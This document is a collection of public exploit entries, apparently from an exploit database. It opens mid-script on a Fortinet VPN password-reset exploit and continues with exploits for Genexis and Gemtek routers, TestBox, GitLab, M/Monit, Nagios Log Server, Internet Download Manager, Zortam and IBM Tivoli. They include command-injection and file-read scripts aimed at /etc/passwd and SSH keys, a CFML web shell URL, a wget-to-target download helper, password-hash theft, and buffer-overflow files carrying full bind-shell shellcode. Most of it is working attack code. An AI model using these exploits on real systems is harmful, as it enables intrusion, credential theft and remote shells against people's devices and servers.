op.u setpass = op.setpass url = "https://"+host+":"+port+"/remote/logincheck" exploit = {'ajax':'1','username':user,'magic':'4tinet2095866','credential':setpass} r = requests.post(url, verify=False, data = exploit) if re.search("/remote/hostcheck_install",r.text): print "[+] - The new password to ["+user+"] is "+setpass+" <<<< [+]" else: print "Exploit Failed. :/"

# Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure # Date: 17th November 2020 # Exploit Author: Nitesh Surana # Vendor Homepage: https://www.gxgroup.eu/ont-products/ # Version: P4410-V2-1.34H # Tested on: Windows/Kali # CVE : CVE-2020-25988 import upnpy upnp = upnpy.UPnP() # Discover UPnP devices on the network # Returns a list of devices e.g.: [Device <Econet IGD>] devices = upnp.discover() # Select the device directly from the list device = devices[0] # Get the services available for this device # Returns a list of services available for the device # device.get_services() # We can now access a specific service on the device by its ID like a dictionary service = device['DeviceInfo1'] # Execute the action by its name (in our case, the 'X_GetAccess' action) # Returns a dictionary containing the cleartext password of 'admin' user. print("Admin Password: {}".format(service.X_GetAccess()['NewX_RootPassword']))

# Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution # Author: Darren King # Date: 2020-07-23 # Vendor Homepage: https://www.ortussolutions.com/products/testbox # Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 # Version : 2.4.0 through to 4.1.0 # Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61 About TestBox ------------------------ TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/). TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, and allows users to run CFML unit tests and to generate reports. https://www.ortussolutions.com/products/testbox https://github.com/Ortus-Solutions/testbox As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments. Command Injection & RCE ------------------------ The file testbox/system/runners/HTMLRunner.cfm is vulnerable to command injection and can be exploited to obtain remote code execution on the remote host. The block below shows the vulnerable code: HTMLRunner.cfm, lines 51-73: // Write TEST.properties in report destination path. if( url.propertiesSummary ){ testResult = testbox.getResult(); errors = testResult.getTotalFail() + testResult.getTotalError(); savecontent variable="propertiesReport"{ writeOutput( ( errors ? "test.failed=true" : "test.passed=true" ) & chr( 10 ) ); writeOutput( "test.labels=#arrayToList( testResult.getLabels() )# test.bundles=#URL.bundles# test.directory=#url.directory# total.bundles=#testResult.getTotalBundles()# total.suites=#testResult.getTotalSuites()# total.specs=#testResult.getTotalSpecs()# total.pass=#testResult.getTotalPass()# total.fail=#testResult.getTotalFail()# total.error=#testResult.getTotalError()# total.skipped=#testResult.getTotalSkipped()#" ); } //ACF Compatibility - check for and expand to absolute path if( !directoryExists( url.reportpath ) ) url.reportpath = expandPath( url.reportpath ); fileWrite( url.reportpath & "/" & url.propertiesFilename, propertiesReport ); } If the "propertiesSummary" query string parameter is specified, the CFM page will write a properties file to the specified path with a summary of the tests performed. The reportpath and propertiesFilename values are both supplied as query string parameters and are unvalidated, meaning that the user can supply an arbitrary filename and have the application output a CFM file (i.e. propertiesFilename=evil.cfm) within the path of the application. The user can also specify the "labels" to apply to the test (via the "labels" query string parameter), which are included in the written properties file. Again, these labels are unvalidated and not sanitized, allowing arbitrary CFML tags and script to be passed to the code. When the properties are output to a CFM file (as per the propertiesFilename parameter), the written CFM can then be accessed via the browser and any corresponding CFML tags will be executed by the CFML server. (Note that Adobe ColdFusion often runs as the System user on Windows, which means it might be possible to achieve remote code execution as System in these circumstances.) Sample URL to write local CFM file: http://<HOST>/testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&reportpath=../runners&propertiesFilename=exec.cfm&labels=<pre><cfexecute name="%23url.cmd%23" arguments="%23url.args%23" timeout="5"></cfexecute></pre> Sample URL to confirm: http://<HOST>/testbox/system/runners/exec.cfm?cmd=whoami&args=/all Versions Affected ------------------------ Versions affected (and platform tested on): - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61) - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) Timeline ------------------------ 2020-07-23 - Reserved CVEs 2020-08-04 - Disclosed issues to vendor 2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.

# Exploit Title: Gitlab 12.9.0 - Arbitrary File Read (Authenticated) # Google Dork: - # Date: 11/15/2020 # Exploit Author: Jasper Rasenberg # Vendor Homepage: https://about.gitlab.com # Software Link: https://about.gitlab.com/install # Version: tested on gitlab version 12.9.0 # Tested on: Kali Linux 2020.3 #You can create as many personal access tokens as you like from your GitLab profile. # Sign in to GitLab. # In the upper-right corner, click your avatar and select Settings. # On the User Settings menu, select Access Tokens. # Choose a name and optional expiry date for the token. # Choose the desired scopes. # Click the Create personal access token button. # Save the personal access token somewhere safe. If you navigate away or refresh your page, and you did not save the token, you must create a new one. # REFERENCE: https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html # pip3 install gitlab # pip3 install requests # Use a client cert to verify SSL or set to False import os import requests import json from time import sleep from gitlab import * session = requests.Session() session.verify = f'{os.getcwd()}/<cert.pem>' # or set session.verify = False host = '' def exploit(projectName, issueTitle, files, token): gl = Gitlab(host, private_token=token, session=session) gl.auth() p1 = gl.projects.create({'name': f"{projectName}-1"}) p2 = gl.projects.create({'name': f"{projectName}-2"}) for i, f in enumerate(files): stripped_f = f.rstrip('\n') issue = p1.issues.create({ \ 'title': f"{issueTitle}-{i}", 'description': \ "![a](/uploads/11111111111111111111111111111111/"\ f"../../../../../../../../../../../../../..{stripped_f})"}) print(issue.description) sleep(3) try: issue.move(p2.id) except Exception as e: pass sleep(3) if __name__ == "__main__": write_files = ['/etc/passwd', '~/.ssh/id_rsa'] with open('senstive_files', 'w') as sens: for file in write_files: sens.write(file) files = list(open('sensitive_files', 'r')) exploit('project-1', 'issue-1', files)

# Title: TestBox CFML Test Framework 4.1.0 - Directory Traversal # Author: Darren King # Date: 2020-07-23 # Vendor Homepage: https://www.ortussolutions.com/products/testbox # Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 # Version : 2.3.0 through to 4.1.0 # Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61 About TestBox ------------------------ TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/). TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, and allows users to run CFML unit tests and to generate reports. https://www.ortussolutions.com/products/testbox https://github.com/Ortus-Solutions/testbox As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments. Directory Traversal ------------------------ The TestBox "test-browser" page does not adequately sanitise the "path" QueryString parameter, allowing an attacker to perform a directory traversal on the page by specifying the value "path=/../" (appending '../' all the way up to the system root). Sample URL: http://<HOST>/testbox/test-browser/index.cfm?path=/../ Versions Affected ------------------------ Versions affected (and platform tested on): - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61) - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) - Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11) Timeline ------------------------ 2020-07-23 - Reserved CVEs 2020-08-04 - Disclosed issues to vendor 2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.

# Title: M/Monit 3.7.4 - Privilege Escalation # Author: Dolev Farhi # Date: 2020-07-09 # Vendor Homepage: https://mmonit.com/ # Version : 3.7.4 import sys import requests url = 'http://your_ip_here:8080' username = 'test' password = 'test123' sess = requests.Session() sess.get(host) def login(): print('Attempting to login...') data = { 'z_username':username, 'z_password':password } headers = { 'Content-Type':'application/x-www-form-urlencoded' } resp = sess.post(url + '/z_security_check', data=data, headers=headers) if resp.ok: print('Logged in successfully.') else: print('Could not login.') sys.exit(1) def privesc(): data = { 'uname':username, 'fullname':username, 'password':password, 'admin':1 } resp = sess.post(url + '/api/1/admin/users/update', data=data) if resp.ok: print('Escalated to administrator.') else: print('Unable to escalate to administrator.') return if __name__ == '__main__': login() privesc()

# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection # Date: 13/09/2020 # Exploit Author: Gabriele Zuddas # Version: 01.01.02.127, 01.01.02.141 # CVE : CVE-2020-24365 Service Provider : Linkem Product Name : LTE CPE Model ID : WVRTM-127ACN Serial ID : GMK170418011089 IMEI : XXXXXXXXXXXXX ICCID : XXXXXXXXXXXXXXXXXX Firmware Version : 01.01.02.141 Firmware Creation Date : May 15 13:04:30 CST 2019 Bootrom Version : U-Boot 1.1.3 Bootrom Creation Date : Oct 23 2015 - 16:03:05 LTE Support Band : 42,43 Injecting happens here: sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)& Exploit has been tested on older verions too: Firmware Version: 01.01.02.127 Firmware Creation Date : May 23 15:34:10 CST 2018 """ import requests, time, argparse, re, sys class Exploit(): CVE = "CVE-2020-24365" def __init__(self, args): self.args = args self.session = requests.Session() def login(self): s = self.session r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password}) if "sid" not in s.cookies: print("[!] Login failed.") exit(1) sid = s.cookies["sid"] s.headers = {"sid": sid} print(f"[*] Login successful! (sid={sid})") def now(self): return int(time.time() * 1000) def exploit(self, command): self.login() with self.session as s: payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}" r = s.get(payload) r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}") content = str(r.content, "utf8") #Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface) r = s.get(payload) r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}") content = str(r.content, "utf8") #TODO: eventually parse content with regex to clean out the output c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content) print(content) print(c[0]) if len(c) > 0: return c[0] else: return False def download_file(self, url): filename = url.rsplit('/', 1)[-1] if self.args.file is not None: print(f"[*] Attempting download of file '{filename}' from {url} ...") if self.exploit(f"wget {url} -O /tmp/{filename}"): print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.") print(self.exploit(f"du -h /tmp/{filename}")) return True else: print(f"[!] Failed to download {filename} from {url}") return False def run(self): if self.args.command is not None: print(self.exploit(self.args.command)) exit() if self.args.file is not None: self.download_file(self.args.file) exit() if __name__ == "__main__": # Create the parser and add arguments parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target") parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use") parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use") parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute") parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory") args = parser.parse_args() # Run exploit X = Exploit(args) if len(sys.argv) > 1: print(f"[*] Exploiting {X.CVE} ...") X.run() else: parser.print_help(sys.stderr)

# Title: M/Monit 3.7.4 - Password Disclosure # Author: Dolev Farhi # Date: 2020-07-09 # Vendor Homepage: https://mmonit.com/ # Version : 3.7.4 import sys import requests url = 'http://your_ip_here:8080' username = 'test' password = 'test123' sess = requests.Session() sess.get(host) def login(): print('Attempting to login...') data = { 'z_username':username, 'z_password':password } headers = { 'Content-Type':'application/x-www-form-urlencoded' } resp = sess.post(url + '/z_security_check', data=data, headers=headers) if resp.ok: print('Logged in successfully.') else: print('Could not login.') sys.exit(1) def steal_hashes(): resp = sess.get(url + '/api/1/admin/users/list') if resp.ok: for i in resp.json(): mmonit_user = i['uname'] result = sess.get(url + '/api/1/admin/users/get?uname={}'.format(mmonit_user)) mmonit_passw = result.json()['password'] print('Stolen MD5 hash. User: {}, Hash: {}'.format(mmonit_user, mmonit_passw)) if __name__ == '__main__': login() steal_hashes()

# Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC) # Date: November 18, 2020 # Exploit Author: Vincent Wolterman # Vendor Homepage: http://www.internetdownloadmanager.com/ # Software Link: http://www.internetdownloadmanager.com/download.html # Version: 6.38.12 # Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Home Build 19041 # Steps to reproduce crash: # 1) Execute provided Perl code # 2) Open IDMan_Crash.txt output file # 3) Copy contents of text file to clipboard # 4) Open Internet Download Manager 6.38 # 5) From the Menu bar -> Downloads -> Scheduler # 6) Check the box for 'Open the following file when done:' # 7) Paste the contents of IDMan_Crash.txt into the input field below # 8) Click 'Apply' and observe the crash #!/usr/bin/perl $baddata = "\x41" x 1302; $baddata .= "\x42" x 2; # this length overwrites NSEH on Windows 7 Pro SP 1 $baddata .= "\x43"x(5000-length($baddata)); $file = "IDMan_Crash.txt"; open (FILE, '>IDMan_Crash.txt'); print FILE $baddata; close (FILE); print "Exploit file created [" . $file . "]\n"; print "Buffer size: " . length($baddata) . "\n";

# Exploit Title: Nagios Log Server 2.1.7 - 'snapshot_name' Persistent Cross-Site Scripting # Date: 31.08.2020 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://www.nagios.com/ # Software Link: https://www.nagios.com/products/nagios-log-server/ # Version: 2.1.7 # Tested on: Linux/ISO # Link: https://github.com/EmreOvunc/Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting # Description A stored cross-site scripting (XSS) in Nagios Log Server 2.1.7 can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page. # PoC To exploit vulnerability, someone could use a POST request to '/nagioslogserver/configure/create_snapshot' by manipulating 'snapshot_name' parameter in the request body to impact users who open a maliciously crafted link or third-party web page. POST /nagioslogserver/configure/create_snapshot HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 117 DNT: 1 Connection: close Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53 Upgrade-Insecure-Requests: 1 csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=[XSS_PAYLOAD]

# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH) # Date: November 19, 2020 # Exploit Author: Vincent Wolterman # Vendor Homepage: https://www.zortam.com/index.html # Software Link: https://www.zortam.com/download.html # Version: 27.60 # Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041 # Steps to reproduce crash: # 1) Run provided Perl code Zortam_MP3_Studio_poc.pl # 2) Open Zortam_Crash.txt output file # 3) Copy contents of text file to clipboard # 4) Open Zortam Mp3 Studio # 5) From the Menu bar -> File -> New Library # 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’ # 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field # 8) Click 'OK' # 9) Connect to victim machine on port 80 #!/usr/bin/perl $baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash) $baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272 $nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled # 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50 # (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL) $seh = "\x62\x59\x01\x10"; # seh overwrite $nop = "\x90" x 12; # NOP sled # msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh # Payload size: 355 bytes $payload = "\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" . "\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" . "\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" . "\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" . "\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" . "\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" . "\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" . "\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" . "\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" . "\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" . "\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" . "\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" . "\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" . "\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" . "\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" . "\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" . "\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" . "\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" . "\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" . "\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" . "\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" . "\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" . "\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" . "\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" . "\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" . "\x9b\xec\xb0\xa9\x89"; $file = "Zortam_Crash.txt"; open (FILE, '>Zortam_Crash.txt'); print FILE $baddata; print FILE $nseh; print FILE $seh; print FILE $nop; print FILE $payload; close (FILE); print "Exploit file created [" . $file . "]\n"; print "Buffer size: " . length($baddata) . "\n";

# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow # Exploit Author: Paolo Stagno aka VoidSec # Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html # Version: 5.2.0.1 # Tested on: Windows 10 Pro v.10.0.19041 Build 19041 """ Usage: IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER" PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1 PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe" FileName : dsmadmc.exe ARCH : I386 DotNET : False ASLR : True DEP : True Authenticode : False StrongNaming : N/A SafeSEH : False ControlFlowGuard : False HighentropyVA : False """ # [ buffer ] # [ 68 byte | EIP | rest of the buffer ] # ^_ESP """ EIP contains normal pattern : 0x33634132 (offset 68) ESP (0x0019e314) points at offset 72 in normal pattern (length 3928) JMP ESP Pointers: 0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 """ #!/usr/bin/python import struct # 4000 bytes buff_max_length=800 eip_offset=68 """ BAD CHARS: \x00\x08\x09\x0a\x0d\x1a\x1b\x7f GOOD CHARS: asciiprint \x20-\x7e MOD CHARS: \x00 -> \x20 ,-----------------------------------------------. | Comparison results: | |-----------------------------------------------| | 80 81 82 83 84 85 86 87| File | 3f 3f 2c 9f 2c 2e 2b d8| Memory 80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File |5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory 90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File |7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File |22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File |2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File |45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File |4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File |8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory f0 |f8 f9 fa fb fc fd fe ff | File |6f 97 a3 96 81 79 5f 98 | Memory `-----------------------------------------------' """ # msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest shellcode = b"" shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a" shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51" shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78" shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54" shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f" shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b" shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e" shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30" shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42" shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f" shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54" shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34" shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31" shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61" shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35" shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f" shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39" shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d" shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53" shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b" shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c" shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c" shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53" shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c" shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38" shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58" shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49" shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69" shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b" shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72" shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d" shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c" shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76" shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75" shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31" shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f" shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d" shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77" shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79" shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58" shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33" shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63" shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51" shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58" shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63" shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48" shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54" shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42" shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69" shellcode += b"\x6f\x50\x55\x54\x48\x41\x41" buff = "" buff += "A" * eip_offset buff += struct.pack("<I",0x02c73d7b) # 0x02803d7b cause char modification needs to be written as 0x02c73d7b buff += shellcode buff += "C" * (buff_max_length - len(buff)) print("Writing {} bytes".format(len(buff))) f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w") f.write(buff) f.close()

